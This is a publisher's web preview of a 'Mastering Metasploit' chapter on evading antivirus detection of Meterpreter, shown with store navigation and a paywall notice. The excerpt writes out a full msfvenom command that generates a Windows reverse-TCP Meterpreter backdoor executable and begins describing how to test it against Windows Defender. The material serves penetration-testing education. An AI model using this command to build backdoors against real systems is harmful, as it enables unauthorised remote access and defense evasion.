Search icon CANCEL
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Conferences
Free Learning
Arrow right icon
Arrow up icon
GO TO TOP
Mastering Metasploit

You're reading from   Mastering Metasploit Exploit systems, cover your tracks, and bypass security controls with the Metasploit 5.0 framework

Arrow left icon
Product type Paperback
Published in Jun 2020
Publisher Packt
ISBN-13 9781838980078
Length 502 pages
Edition 4th Edition
Languages
Arrow right icon
Author (1):
Arrow left icon
Nipun Jaswal Nipun Jaswal
Author Profile Icon Nipun Jaswal
Nipun Jaswal
Arrow right icon
View More author details
Toc

Table of Contents (17) Chapters Close

Preface 1. Section 1 – Preparation and Development
2. Chapter 1: Approaching a Penetration Test Using Metasploit FREE CHAPTER 3. Chapter 2: Reinventing Metasploit 4. Chapter 3: The Exploit Formulation Process 5. Chapter 4: Porting Exploits 6. Section 2 – The Attack Phase
7. Chapter 5: Testing Services with Metasploit 8. Chapter 6: Virtual Test Grounds and Staging 9. Chapter 7: Client-Side Exploitation 10. Section 3 – Post-Exploitation and Evasion
11. Chapter 8: Metasploit Extended 12. Chapter 9: Evasion with Metasploit 13. Chapter 10: Metasploit for Secret Agents 14. Chapter 11: Visualizing Metasploit 15. Chapter 12: Tips and Tricks 16. Other Books You May Enjoy

Evading Meterpreter detection using C wrappers and custom encoders

Meterpreter is one of the most popular payloads used by security researchers. However, since it's popular, it is detected by most of the AV solutions out there and tends to get flagged in a flash.

This can be seen in the following steps:

  1. Let's generate a simple Metasploit executable using the msfvenom -a x64 –-platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.204.143 LPORT=80 -o Desktop/Shell2.exe command, as follows:

    Figure 9.1 – Generating the payload for x64 Windows using msfvenom

    Here, we created a simple reverse TCP Meterpreter executable backdoor using the msfvenom command. Additionally, we mentioned LHOST and LPORT, which is EXE for the PE/COFF executable. We can see that the executable was generated successfully.

  2. Let's move this executable to the apache folder and try downloading and executing it on a Windows 10 OS secured by Windows Defender and...
lock icon The rest of the chapter is locked
Register for a free Packt account to unlock a world of extra content!
A free Packt account unlocks extra newsletters, articles, discounted offers, and much more. Start advancing your knowledge today.
Unlock this book and the full library FREE for 7 days
Get unlimited access to 7000+ expert-authored eBooks and videos courses covering every tech area you can think of
Renews at $19.99/month. Cancel anytime